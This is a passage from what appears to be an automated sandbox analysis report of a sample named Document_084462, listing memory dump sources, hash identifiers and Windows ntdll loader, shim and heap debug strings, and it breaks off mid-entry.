                                                                              • Instruction Fuzzy Hash: 7FA17AB5604351EFEB04CF18C895A2ABBF5FB88360F084529E945EB350EB74EC45CB91
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 37B244AB
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 37B24592
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37B24530
                                                                              • Execute=1, xrefs: 37B2451E
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37B24460
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37B24507
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 37B2454D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: b28aaffdd86a690723c735b44fe50c73d76088859b2eeb02922cd09f5b18ccd9
                                                                              • Instruction ID: 39365648df7ef13794ac8aaf4572943c4c815761cbfe773acf7370383c8c352e
                                                                              • Opcode Fuzzy Hash: b28aaffdd86a690723c735b44fe50c73d76088859b2eeb02922cd09f5b18ccd9
                                                                              • Instruction Fuzzy Hash: 9C510571A013197AFB109AA4DC85FE973BCEF48355F4004ADED29A7580EB74AE41CF62
                                                                              Strings
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B17807
                                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 37B178F3
                                                                              • SsHd, xrefs: 37ACA304
                                                                              • Actx , xrefs: 37B17819, 37B17880
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 37B177DD, 37B17802
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B177E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                              • API String ID: 0-1988757188
                                                                              • Opcode ID: b1634820aed5ca31df884aa15b1ba132e9e1bf4818a66fe409db49b3a5464274
                                                                              • Instruction ID: e6da88b950cf95076760dec7e9f5ed8f840bd4dab9217a9dd8feb8748b3a92a8
                                                                              • Opcode Fuzzy Hash: b1634820aed5ca31df884aa15b1ba132e9e1bf4818a66fe409db49b3a5464274
                                                                              • Instruction Fuzzy Hash: 25E1C0B8604302AFE715CF64C9D472AB7E1BB84364F504A2DED75CB290DB31E985CB82
                                                                              APIs
                                                                              Strings
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B19178
                                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37B19372
                                                                              • GsHd, xrefs: 37ACD794
                                                                              • Actx , xrefs: 37B19315
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 37B1914E, 37B19173
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37B19153
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                              • API String ID: 3446177414-2196497285
                                                                              • Opcode ID: ff7583cf9da370107d0d74d94c7a5e66006d869346b513a64153584066dc2741
                                                                              • Instruction ID: 4eff17698633e93d463e49d14394869d371dba9d22b31725208cabf7c6631f37
                                                                              • Opcode Fuzzy Hash: ff7583cf9da370107d0d74d94c7a5e66006d869346b513a64153584066dc2741
                                                                              • Instruction Fuzzy Hash: C5E180B4604382AFE710CF24C980B5AB7F5BF88364F404A6DED65DB281D771E945CB92
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 37AA651C
                                                                                • Part of subcall function 37AA6565: RtlDebugPrintTimes.NTDLL ref: 37AA6614
                                                                                • Part of subcall function 37AA6565: RtlDebugPrintTimes.NTDLL ref: 37AA665F
                                                                              Strings
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 37B097B9
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37B09790
                                                                              • apphelp.dll, xrefs: 37AA6446
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 37B0977C
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B097A0, 37B097C9
                                                                              • LdrpInitShimEngine, xrefs: 37B09783, 37B09796, 37B097BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-204845295
                                                                              • Opcode ID: 9a9301c9307dbe3a014214e70f427d3159a821b91b88cae11dee51a17bc3c6ce
                                                                              • Instruction ID: 7d369212865e9e71eae160140cfd273e3bc20fec9fad8f2b6b22832cd49b8c93
                                                                              • Opcode Fuzzy Hash: 9a9301c9307dbe3a014214e70f427d3159a821b91b88cae11dee51a17bc3c6ce
                                                                              • Instruction Fuzzy Hash: 6451AE712493059BE354DF20C995FABBBF8EB84654F400929F9A497290EB38D904CF93
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                              • API String ID: 3446177414-4227709934
                                                                              • Opcode ID: d453bee3950821652cae182b858a695ba079ab2a81c9b0ba8d415721fdab34a2
                                                                              • Instruction ID: ef44f00fc05b07b6571df3a7351b33b1af996a562a62fa785ecea023c451c857
                                                                              • Opcode Fuzzy Hash: d453bee3950821652cae182b858a695ba079ab2a81c9b0ba8d415721fdab34a2
                                                                              • Instruction Fuzzy Hash: 59416EB5A02219EFEB01DF94C885AEEBBB5FF49354F104029EC08B7340D735AA11EB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$@$@wMw
                                                                              • API String ID: 3446177414-1508499165
                                                                              • Opcode ID: 2bb79d77efe2236ee972141b4b9f19747910f6887dd3731512ffa288acaabbc3
                                                                              • Instruction ID: 784da03ae0c564f4ee5f4c16197703977491cf85fd8d8b01ce23e1363c87168e
                                                                              • Opcode Fuzzy Hash: 2bb79d77efe2236ee972141b4b9f19747910f6887dd3731512ffa288acaabbc3
                                                                              • Instruction Fuzzy Hash: F5812CB1D00269DBEB31CB54CD45BEEB7B8AB48750F0041EAEA19B7250D7349E85CFA1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                              • API String ID: 3446177414-3492000579
                                                                              • Opcode ID: 0e1a5408135f290ae756392938c52816b87e8242719334817058e06e05ad36bd
                                                                              • Instruction ID: fca7f0991a72741d07ea5cfcaf0d4e48e85e9680da9145f952933a8f6622197b
                                                                              • Opcode Fuzzy Hash: 0e1a5408135f290ae756392938c52816b87e8242719334817058e06e05ad36bd
                                                                              • Instruction Fuzzy Hash: 0D7145B5901695EFEB01DFA8D491AADFBF2FF48320F048059E851AB251CB39A941CF52
                                                                              APIs
                                                                              Strings
                                                                              • LdrpLoadShimEngine, xrefs: 37B0984A, 37B0988B
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B09854, 37B09895
                                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37B09843
                                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37B09885
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-3589223738
                                                                              • Opcode ID: e14f123c42c37f939ebd38e8fdebbc606244dde12dde69a43c47783ed708322b
                                                                              • Instruction ID: 5fd53c5ee8f5d0500d48815792d3250b2eaf9e10b1a410254a1569d142c91001
                                                                              • Opcode Fuzzy Hash: e14f123c42c37f939ebd38e8fdebbc606244dde12dde69a43c47783ed708322b
                                                                              • Instruction Fuzzy Hash: C85124B5A013589FEB48EBA8CC5AFED7BB5AB44354F040125EC60BB285DB389C45CB52
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                              • API String ID: 3446177414-3224558752
                                                                              • Opcode ID: 2a62f5f428b69dee1ca8fe555704e664a5de277bbb25aa11d1c232cc0edd5656
                                                                              • Instruction ID: 76f739c0c86d681d1ea1b7e9598fe06b971691de075f6bf0046d67ba05116caa
                                                                              • Opcode Fuzzy Hash: 2a62f5f428b69dee1ca8fe555704e664a5de277bbb25aa11d1c232cc0edd5656
                                                                              • Instruction Fuzzy Hash: 79414674601750EFE301CF64C994F5AB7B4FF40360F008569EC2597392CB38A980CB92
                                                                              APIs
                                                                              Strings
                                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 37B5EDE3
                                                                              • HEAP: , xrefs: 37B5ECDD
                                                                              • ---------------------------------------, xrefs: 37B5EDF9
                                                                              • Entry Heap Size , xrefs: 37B5EDED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                              APIs
                                                                              Strings
                                                                              • LdrpFindDllActivationContext, xrefs: 37B23440, 37B2346C
                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37B23439
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 37B2344A, 37B23476
                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 37B23466
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                              Strings
                                                                              • apphelp.dll, xrefs: 37AD2382
                                                                              • LdrpDynamicShimModule, xrefs: 37B1A7A5
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 37B1A79F
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B1A7AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                              APIs
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B19F2E
                                                                              • LdrpCheckModule, xrefs: 37B19F24
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 37B19F1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              APIs
                                                                              Strings
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 37B280E9
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B280F3
                                                                              • Failed to reallocate the system dirs string !, xrefs: 37B280E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              APIs
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 37B34519
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37B34508
                                                                              • LdrpCheckRedirection, xrefs: 37B3450F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Wow64 Emulation Layer
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *'2$!</6$#jf$$4$jf"#
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                              • String ID:
                                                                              • API String ID: 4281723722-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$Flst
                                                                              • API String ID: 0-758220159
                                                                              APIs
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 37AB0586
                                                                              • kLsE, xrefs: 37AB05FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 3446177414-2547482624
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: 0$0
                                                                              • API String ID: 3446177414-203156872

                                                                              Execution Graph

                                                                              Execution Coverage:4.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:52
                                                                              Total number of Limit Nodes:4

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$Xnz/
                                                                              • API String ID: 0-726598149

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
